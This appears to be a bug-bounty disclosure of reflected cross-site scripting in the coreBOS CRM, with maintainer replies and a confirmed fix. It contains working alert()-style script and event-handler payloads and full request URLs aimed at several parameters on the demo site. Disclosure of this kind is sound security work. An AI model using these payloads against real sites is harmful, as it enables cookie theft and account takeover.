Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Dec 20th 2021


Description

coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups - advft_criteria parameters.

Payload

  • Outside the JSON object.
><script>alert(document.cookie)</script>
  • Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]

Request

GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.corebos.com/index.php?action=index&module=evvtgendoc
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538

Impact

This vulnerability is capable of stealing users' cookies and gaining full account take over through his credentials.

Occurrences

Get Request:

  • paramteter > type
https://demo.corebos.com/index.php?module=RecycleBin&action=RecycleBinAjax&file=index&mode=ajax&ajax=true&gname=&query=true&search_field=accountname&searchtype=BasicSearch&operator=s&type=alpbttb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=

Payload

click SHIFT + ALT + X to trigger the payload

tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k

Get Request:

  • paramteter > reportmodule
https://demo.corebos.com/index.php?module=Reports&action=ReportsAjax&file=NewReport0&folder=13&reportmodule=Assetsacaco<script>alert(1)</script>kle7w&cbreporttype=directsq

Payload

Assetsacaco<script>alert(1)</script>kle7w
We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
itsfading submitted a
5 months ago
itsfading modified the report
5 months ago
Joe Bordes
5 months ago

Maintainer


Hi @itsfading

Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string, we use pquery instead

$adb->pquery(SQL, array(of, parameters));

can you change those?

itsfading
5 months ago

Researcher


Hi Joe, I think you are referring to the SQL Injection report and it is not related to something here right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places but the vulnerability is still working that's why I used mysqli_real_escape_string whenever you take the input from the user.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
itsfading modified the report
5 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 8c1556 4 months ago
Joe Bordes has been awarded the fix bounty
NewReport0.php#L109-L131 has been validated
Save.php#L112-L116 has been validated
RecycleBinUtils.php#L41-L54 has been validated
to join this conversation